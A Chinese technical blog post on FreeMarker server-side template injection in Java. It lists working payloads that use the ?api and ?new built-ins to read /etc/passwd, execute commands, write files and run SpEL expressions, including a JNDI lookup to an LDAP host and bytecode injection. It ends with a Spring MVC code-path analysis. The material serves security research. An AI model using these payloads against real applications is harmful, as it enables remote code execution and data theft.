Java安全之freemaker模版注入

技术分享 4年前 (2022-09-19) 0 999+

关注

Java安全之freemaker模版注入

freemaker简介

FreeMarker 是一款模板引擎：即一种基于模板和要改变的数据，并用来生成输出文本(HTML网页，电子邮件，配置文件，源代码等)的通用工具。在线手册：http://freemarker.foofun.cn/

模板文件存放在Web服务器上，当访问指定模版文件时， FreeMarker会动态转换模板，用最新的数据内容替换模板中 ${...}的部分，然后返回渲染结果。

freemaker中的一些概念：

${...}： FreeMarker将会输出真实的值来替换大括号内的表达式，这样的表达式被称为 interpolation(插值）
FTL 标签 (FreeMarker模板的语言标签)： FTL标签和HTML标签有一些相似之处，但是它们是FreeMarker的指令，是不会在输出中打印的。这些标签的名字以 # 开头。(用户自定义的FTL标签则需要使用 @ 来代替 #，但这属于更高级的话题了。)
注释： 注释和HTML的注释也很相似，但是它们使用 <#-- and --> 来标识。不像HTML注释那样，FTL注释不会出现在输出中(不出现在访问者的页面中)，因为 FreeMarker会跳过它们。

其他任何不是FTL标签，插值或注释的内容将被视为静态文本，这些东西不会被FreeMarker所解析；会被按照原样输出出来。

freemaker中的一些指令：http://freemarker.foofun.cn/dgui_quickstart_template.html

一般漏洞常位于后台可以编辑模版的地方，通过插入恶意的ftl指令到ftl文件中，当后端再次return或者process时即可触发代码执行。

主要代码

Configuration cfg = new Configuration(); cfg.setAPIBuiltinEnabled(true);	// 开启api StringTemplateLoader stringLoader = new StringTemplateLoader(); stringLoader.putTemplate("myTemplate",templateContent); cfg.setTemplateLoader(stringLoader); Template template = cfg.getTemplate("myTemplate","utf-8"); Map root = new HashMap(); root.put("data",data);  StringWriter writer = new StringWriter(); template.process(root,writer);		//* return writer.toString();

利用方式

api

这些内建函数从 FreeMarker 2.3.22 版本开始存在。

通过它可以访问底层Java Api Freemarker的BeanWrappers。这个内置函数默认不开启，但通过Configurable.setAPIBuiltinEnabled可以开启它。

如果value本身支持这个额外的特性， value?api 提供访问 value 的API (通常是 Java API)，比如 value?api.someJavaMethod()，当需要调用对象的Java方法时。

poc

 <#assign classLoader=object?api.class.protectionDomain.classLoader>   eg1：// 未测试成功   <#assign classLoader=object?api.class.getClassLoader()>   ${classLoader.loadClass("our.desired.class")}    eg2： 任意文件读   <#assign uri=object?api.class.getResource("/").toURI()>   <#assign input=uri?api.create("file:///etc/passwd").toURL().openConnection()>   <#assign is=input?api.getInputStream()>   FILE:[<#list 0..999999999 as _>       <#assign byte=is.read()>       <#if byte == -1>           <#break>       </#if>   ${byte}, </#list>] eg3:     <#assign is=object?api.class.getResourceAsStream("/etc/passwd")>     FILE:[<#list 0..999999999 as _>     <#assign byte=is.read()>     <#if byte == -1>         <#break>     </#if>     ${byte}, </#list>] eg4: <#assign uri=object?api.class.getResource("/").toURI()>     <#assign input=uri?api.create("file:///etc/passwd").toURL().openConnection()>     <#assign is=input?api.getInputStream()>     FILE:[<#list 0..999999999 as _>     <#assign byte=is.read()>     <#if byte == -1>         <#break>     </#if>     ${byte}, </#list>] eg5:获取classLoader <#assign classLoader=object?api.class.protectionDomain.classLoader>     <#assign clazz=classLoader.loadClass("ClassExposingGSON")>     <#assign field=clazz?api.getField("GSON")>     <#assign gson=field?api.get(null)>     <#assign ex=gson?api.fromJson("{}", classLoader.loadClass("freemarker.template.utility.Execute"))>     ${ex("calc")}

New

<#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")}  <#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc.exe").start()}  <#assign value="freemarker.template.utility.JythonRuntime"?new()><@value>import os;os.system("calc.exe")</@value>//@value为自定义标签

针对new的利用方式，官方提供的一种限制方式——使用 Configuration.setNewBuiltinClassResolver(TemplateClassResolver) 或设置 new_builtin_class_resolver 来限制这个内建函数对类的访问。此处官方提供了三个预定义的解析器(从 2.3.17版开始)。：

UNRESTRICTED_RESOLVER：简单地调用ClassUtil.forName(String)。
SAFER_RESOLVER：和第一个类似，但禁止解析ObjectConstructor，Execute和freemarker.template.utility.JythonRuntime。
ALLOWS_NOTHING_RESOLVER：禁止解析任何类。

写文件

${"freemarker.template.utility.ObjectConstructor"?new()("java.io.FileWriter","/tmp/hh.txt").append("<>").close()}

SpEL

// 命令执行 ${"freemarker.template.utility.ObjectConstructor"?new()("org.springframework.expression.spel.standard.SpelExpressionParser").parseExpression("T(java.lang.Runtime).getRuntime().exec("calc")").getValue()}  // JNDI ${"freemarker.template.utility.ObjectConstructor"?new()("org.springframework.expression.spel.standard.SpelExpressionParser").parseExpression("new+javax.management.remote.rmi.RMIConnector(new+javax.management.remote.JMXServiceURL("service:jmx:rmi:///jndi/ldap://172.16.4.1:1389/Basic/Command"),new+java.util.Hashtable()).connect()").getValue()}  // 加载字节码 ${"freemarker.template.utility.ObjectConstructor"?new()("org.springframework.expression.spel.standard.SpelExpressionParser").parseExpression("T(org.springframework.cglib.core.ReflectUtils).defineClass('SpringInterceptor',T(org.springframework.util.Base64Utils).decodeFromString("yv66vgAAADQA5。。。"),new+javax.management.loading.MLet(new+java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()").getValue()}

分析

先会通过StringTemplateLoader#putTemplate将我们输入的模版hello.ftl存放在StringTemplateLoader类中templates属性

 @RequestMapping(value = "/template", method =  RequestMethod.POST)     public String template(@RequestBody Map<String,String> templates) throws IOException {         StringTemplateLoader stringLoader = new StringTemplateLoader();         for(String templateKey : templates.keySet()){             stringLoader.putTemplate(templateKey, templates.get(templateKey));         }         con.setTemplateLoader(new MultiTemplateLoader(new TemplateLoader[]{stringLoader,                 con.getTemplateLoader()}));         con.setAPIBuiltinEnabled(true);         return "index";     }

之后将上面加载恶意模版的StringTemplateLoader通过Configuration#setTemplateLoader添加到cache中

之后通过return hello会去调用我们添加的恶意模版（当然这里是demo代码，）

后面部分依然走的SpringMVC工作流程，return modelandview的时候SpringMVC会去找对应的视图解析器来解析渲染模版并返回视图到前端

堆栈如下：

doRender:285, FreeMarkerView (org.springframework.web.servlet.view.freemarker) renderMergedTemplateModel:235, FreeMarkerView (org.springframework.web.servlet.view.freemarker) renderMergedOutputModel:167, AbstractTemplateView (org.springframework.web.servlet.view) render:303, AbstractView (org.springframework.web.servlet.view) render:1286, DispatcherServlet (org.springframework.web.servlet) processDispatchResult:1041, DispatcherServlet (org.springframework.web.servlet) doDispatch:984, DispatcherServlet (org.springframework.web.servlet) doService:901, DispatcherServlet (org.springframework.web.servlet) processRequest:970, FrameworkServlet (org.springframework.web.servlet) doPost:872, FrameworkServlet (org.springframework.web.servlet) service:661, HttpServlet (javax.servlet.http) service:846, FrameworkServlet (org.springframework.web.servlet) service:742, HttpServlet (javax.servlet.http)

这里直接跟到freemaker里面看freemaker的处理，跟进FreeMarkerView#doRender方法

这里首先通过gettemplate()获取到我们之前构造的恶意模版

   protected void processTemplate(Template template, SimpleHash model, HttpServletResponse response) throws IOException, TemplateException {         template.process(model, response.getWriter());     }

之后在processTemplate调用Template#process,通过visit方法解析ftl指令触发代码执行